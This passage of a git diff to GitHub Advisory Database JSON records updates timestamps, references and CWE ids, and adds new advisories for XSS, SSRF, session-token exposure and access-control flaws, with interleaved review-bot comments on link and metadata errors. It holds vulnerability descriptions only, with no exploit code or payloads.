 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-3087"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-3087"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-3087"
diff --git a/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json b/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json
index 32835497784c8..bcb3bfc371024 100644
--- a/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json
+++ b/advisories/unreviewed/2025/04/GHSA-pc6c-whfr-9343/GHSA-pc6c-whfr-9343.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-pc6c-whfr-9343",
- "modified": "2025-04-04T06:34:24Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-04-04T06:34:24Z",
 "aliases": [
 "CVE-2025-2159"
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2159"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-2159"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-2159"
diff --git a/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json b/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json
index 9b11c76c7461d..f03f9d64ace88 100644
--- a/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json
+++ b/advisories/unreviewed/2025/06/GHSA-3r4h-xx4c-77cj/GHSA-3r4h-xx4c-77cj.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3r4h-xx4c-77cj",
- "modified": "2025-10-09T18:30:25Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-06-15T21:30:30Z",
 "aliases": [
 "CVE-2025-5964"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-5964"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-5964"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-5964"
diff --git a/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json b/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json
index 85ac90cce45d5..355bfe6f53e7a 100644
--- a/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json
+++ b/advisories/unreviewed/2025/06/GHSA-525r-jw95-mh3f/GHSA-525r-jw95-mh3f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-525r-jw95-mh3f",
- "modified": "2025-10-29T21:30:32Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-06-16T09:30:38Z",
 "aliases": [
 "CVE-2025-2091"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-2091"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-2091"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-2091"
diff --git a/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json b/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json
index e24eaffeeae06..733e4367f4231 100644
--- a/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json
+++ b/advisories/unreviewed/2025/09/GHSA-x6wm-h4q7-p8hv/GHSA-x6wm-h4q7-p8hv.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-x6wm-h4q7-p8hv",
- "modified": "2025-10-14T21:30:26Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-09-15T12:31:25Z",
 "aliases": [
 "CVE-2025-9826"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9826"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-9826"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2024-9826"
diff --git a/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json b/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json
index 3e18c6e0f7ce6..c0f6c2108a637 100644
--- a/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json
+++ b/advisories/unreviewed/2025/11/GHSA-29mq-c452-8pvf/GHSA-29mq-c452-8pvf.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-29mq-c452-8pvf",
- "modified": "2025-11-20T21:30:31Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-11-17T12:30:14Z",
 "aliases": [
 "CVE-2025-11681"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11681"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-11681"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-11681"
diff --git a/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json b/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json
index d8dfe288bb6c0..b8f3357f4026d 100644
--- a/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json
+++ b/advisories/unreviewed/2025/12/GHSA-829c-jpvx-vfrv/GHSA-829c-jpvx-vfrv.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-829c-jpvx-vfrv",
- "modified": "2025-12-19T09:30:27Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-12-19T09:30:27Z",
 "aliases": [
 "CVE-2025-13008"
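Review bot: In the second GHSA-x6wm-h4q7-p8hv hunk, the existing reference `https://product.m-files.com/security-advisories/cve-2024-9826` carries a different year from the record's alias `CVE-2025-9826` and from the empower.m-files.com link added just above it. The other M-Files records visible in this patch use the same CVE id in both vendor URLs, so this looks like an upstream typo. If the vendor page is confirmed, the line would read `"url": "https://product.m-files.com/security-advisories/cve-2025-9826"`. Until it is checked, the reference may lead readers to a different advisory or to a missing page.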
@@ -19,6 +19,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13008"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-13008"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-13008"
diff --git a/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json b/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json
index 9f921bba0e96f..7566460559012 100644
--- a/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json
+++ b/advisories/unreviewed/2025/12/GHSA-h8c5-64wc-h8mf/GHSA-h8c5-64wc-h8mf.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-h8c5-64wc-h8mf",
- "modified": "2026-01-06T21:30:28Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-12-18T09:30:24Z",
 "aliases": [
 "CVE-2025-14318"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14318"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-14318"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-14318"
diff --git a/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json b/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json
index 3442aeb84836c..e036631ce0fc6 100644
--- a/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json
+++ b/advisories/unreviewed/2025/12/GHSA-xcmx-jj38-v524/GHSA-xcmx-jj38-v524.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-xcmx-jj38-v524",
- "modified": "2026-01-06T18:31:24Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2025-12-19T09:30:27Z",
 "aliases": [
 "CVE-2025-14267"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14267"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2025-14267"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2025-14267"
diff --git a/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json b/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json
index 8afecde3d4336..8c7efb33c1c1e 100644
--- a/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json
+++ b/advisories/unreviewed/2026/01/GHSA-4v8j-92c3-9f2f/GHSA-4v8j-92c3-9f2f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4v8j-92c3-9f2f",
- "modified": "2026-01-30T15:31:14Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2026-01-30T15:31:14Z",
 "aliases": [
 "CVE-2026-1684"
@@ -31,6 +31,10 @@
 "type": "WEB",
 "url": "https://github.com/free5gc/smf/pull/188"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/free5gc/smf"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.343477"
diff --git a/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json b/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json
index 3843011750e91..6a8bca5b8bd06 100644
--- a/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json
+++ b/advisories/unreviewed/2026/01/GHSA-frg8-29h3-wvgf/GHSA-frg8-29h3-wvgf.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-frg8-29h3-wvgf",
- "modified": "2026-01-30T15:31:14Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2026-01-30T15:31:14Z",
 "aliases": [
 "CVE-2026-1683"
@@ -35,6 +35,10 @@
 "type": "WEB",
 "url": "https://github.com/free5gc/smf/pull/188"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/free5gc/smf"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.343476"
diff --git a/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json b/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json
index fc351e90cfc9a..1238be454f62f 100644
--- a/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json
+++ b/advisories/unreviewed/2026/01/GHSA-grx8-c238-5vmr/GHSA-grx8-c238-5vmr.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-grx8-c238-5vmr",
- "modified": "2026-02-02T18:31:31Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2026-01-21T12:30:30Z",
 "aliases": [
 "CVE-2026-0663"
@@ -23,6 +23,10 @@
 "type": "ADVISORY",
 "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0663"
 },
+ {
+ "type": "WEB",
+ "url": "https://empower.m-files.com/security-advisories/CVE-2026-0663"
+ },
 {
 "type": "WEB",
 "url": "https://product.m-files.com/security-advisories/cve-2026-0663"
diff --git a/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json b/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json
index e065cabb91877..56fd16af59a89 100644
--- a/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json
+++ b/advisories/unreviewed/2026/01/GHSA-hc69-r6rr-hmxf/GHSA-hc69-r6rr-hmxf.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-hc69-r6rr-hmxf",
- "modified": "2026-01-30T15:31:14Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2026-01-30T15:31:14Z",
 "aliases": [
 "CVE-2026-1682"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://github.com/free5gc/smf/pull/188"
 },
+ {
+ "type": "WEB",
+ "url": "https://github.com/free5gc/smf"
+ },
 {
 "type": "WEB",
 "url": "https://vuldb.com/?ctiid.343475"
diff --git a/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json b/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json
index 9ddf49f0a1b87..6172acaee9978 100644
--- a/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json
+++ b/advisories/unreviewed/2026/02/GHSA-2846-35pp-gqxq/GHSA-2846-35pp-gqxq.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2846-35pp-gqxq",
- "modified": "2026-02-09T12:30:22Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2026-02-09T12:30:22Z",
 "aliases": [
 "CVE-2026-2227"
@@ -39,6 +39,10 @@
 "type": "WEB",
 "url": "https://vuldb.com/?submit.753450"
 },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753980"
+ },
 {
 "type": "WEB",
 "url": "https://www.dlink.com"
diff --git a/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json b/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json
index 3053ce35ea65e..69278a35b7548 100644
--- a/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json
+++ b/advisories/unreviewed/2026/02/GHSA-2fpq-m96x-2xgf/GHSA-2fpq-m96x-2xgf.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2fpq-m96x-2xgf",
- "modified": "2026-02-05T00:31:01Z",
+ "modified": "2026-02-23T12:31:29Z",
 "published": "2026-02-05T00:31:01Z",
 "aliases": [
 "CVE-2026-1895"
@@ -46,6 +46,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.742666"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.742679"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json b/advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json
new file mode 100644
index 0000000000000..95e4aa8f89ca3
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2ww6-c8hm-gqw6/GHSA-2ww6-c8hm-gqw6.json
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2ww6-c8hm-gqw6", + "modified": "2026-02-23T12:31:29Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-40701" + ], + "details": "Reflected Cross-Site Scripting vulnerability in SOTESHOP, version 8.3.4. THis vulnerability allows an attacker execute JavaScript code in the victim's browser when a malicious URL with the 'id' parameter in '/adsTracker/checkAds' is sent to the victim. The vulnerability can be exploited to steal sensitive user information such as session cookies, or to perform actions on their behalf.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40701" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-xss-sotes-soteshop" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json b/advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json new file mode 100644 index 0000000000000..9c29f858f60b1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3mqj-x3cm-3wgr/GHSA-3mqj-x3cm-3wgr.json 
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3mqj-x3cm-3wgr", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:30Z", + "aliases": [ + "CVE-2026-2985" + ], + "details": "A security flaw has been discovered in Tiandy Video Surveillance System 视频监控平台 7.17.0. This impacts the function downloadImage of the file /com/tiandy/easy7/core/bo/CLSBODownLoad.java. Performing a manipulation of the argument urlPath results in server-side request forgery. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2985" + }, + { + "type": "WEB", + "url": "https://my.feishu.cn/wiki/C1TIwBoJziINWlkGt8ucnZJPnEb?from=from_copylink" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347368" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347368" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756137" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json index 74426455a29ad..332d8539a73ad 100644 --- a/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json 
+++ b/advisories/unreviewed/2026/02/GHSA-429q-mrc4-38fr/GHSA-429q-mrc4-38fr.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-429q-mrc4-38fr", - "modified": "2026-02-23T09:31:23Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-23T09:31:23Z", "aliases": [ "CVE-2026-25747" @@ -21,6 +21,10 @@ { "type": "WEB", "url": "https://github.com/oscerd/CVE-2026-25747" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/18/6" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json b/advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json new file mode 100644 index 0000000000000..8a854b647386a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-4x58-j42h-46c2/GHSA-4x58-j42h-46c2.json 
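Review bot: The reference added in the second hunk of GHSA-429q-mrc4-38fr.json is a plain-HTTP link, so anyone following it from the advisory fetches the disclosure thread over a channel that can be read or altered in transit. If the host serves the same path over TLS, store it as `"url": "https://www.openwall.com/lists/oss-security/2026/02/18/6"`. The same applies to the `.../2026/02/18/7` reference added to GHSA-c3f3-cc42-xr9v.json later in this patch.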
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4x58-j42h-46c2", + "modified": "2026-02-23T12:31:29Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-40986" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in PideTuCita. This vulnerability allows an attacker to execute JavaScript code in the victim's browser by sending him/her a malicious URL using the endpoint 'cookies/indes.php/'. This vulnerability can be exploited to steal confidential user data, such as session cookies or to perform actions on behalf of the user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40986" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/reflected-cross-site-scripting-pidetucita" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:20Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json index 93f7774cb35fb..aff0817b94c65 100644 --- a/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json +++ b/advisories/unreviewed/2026/02/GHSA-c3f3-cc42-xr9v/GHSA-c3f3-cc42-xr9v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c3f3-cc42-xr9v", - "modified": "2026-02-23T09:31:23Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-23T09:31:23Z", "aliases": [ "CVE-2026-23552" 
@@ -21,6 +21,10 @@ { "type": "WEB", "url": "https://github.com/oscerd/CVE-2026-23552" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2026/02/18/7" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json b/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json index 36370774fcc0f..9be451fc72c07 100644 --- a/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json +++ b/advisories/unreviewed/2026/02/GHSA-c6rr-xhrp-94pr/GHSA-c6rr-xhrp-94pr.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-269" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json b/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json index ca3bd2d942b8d..955a8fc65ec6f 100644 --- a/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json +++ b/advisories/unreviewed/2026/02/GHSA-gj3h-r32m-qjhw/GHSA-gj3h-r32m-qjhw.json @@ -42,6 +42,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-266", "CWE-269" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json b/advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json new file mode 100644 index 0000000000000..4ae63261605ad --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hhvh-4rv2-p55m/GHSA-hhvh-4rv2-p55m.json 
@@ -0,0 +1,34 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hhvh-4rv2-p55m", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:29Z", + "aliases": [ + "CVE-2025-59873" + ], + "details": "An information exposure vulnerability exists in\n\nVulnerability in HCL Software ZIE for Web.\n\nThe application transmits sensitive session tokens and authentication identifiers within the URL query parameters . An attacker who gains access to any network log or operates a site linked from the application can hijack user sessions\n\nThis issue affects ZIE for Web: v16.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-59873" + }, + { + "type": "WEB", + "url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0128902" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T11:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json b/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json index 806e247c033b8..f18da5530a5d0 100644 --- a/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json +++ b/advisories/unreviewed/2026/02/GHSA-jm4f-crxv-97j5/GHSA-jm4f-crxv-97j5.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-jm4f-crxv-97j5", - "modified": "2026-02-08T21:30:17Z", + "modified": "2026-02-23T12:31:29Z", "published": "2026-02-08T21:30:17Z", "aliases": [ "CVE-2026-2171" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.749233" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754641" } ], "database_specific": { 
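Review bot: The new GHSA-hhvh-4rv2-p55m record ships with `"cwe_ids": []` even though its `details` text describes session tokens and authentication identifiers carried in URL query parameters, so CWE-based filters and dashboards will not surface it. If the upstream source has no classification yet, CWE-598 (sensitive query strings) looks like the closest fit and could be recorded as `"cwe_ids": ["CWE-598"]` once confirmed against the vendor bulletin. The `details` string also opens with a duplicated fragment ("An information exposure vulnerability exists in" followed by "Vulnerability in HCL Software ZIE for Web."), which is worth normalising to one sentence.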
diff --git a/advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json b/advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json new file mode 100644 index 0000000000000..4626f2917cbfe --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m8cf-3mc4-cgqh/GHSA-m8cf-3mc4-cgqh.json 
@@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8cf-3mc4-cgqh", + "modified": "2026-02-23T12:31:30Z", + "published": "2026-02-23T12:31:30Z", + "aliases": [ + "CVE-2026-2983" + ], + "details": "A vulnerability was determined in SourceCodester Student Result Management System 1.0. The impacted element is an unknown function of the file /admin/core/import_users.php of the component Bulk Import. This manipulation of the argument File causes improper access controls. Remote exploitation of the attack is possible. The exploit has been publicly disclosed and may be utilized.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": 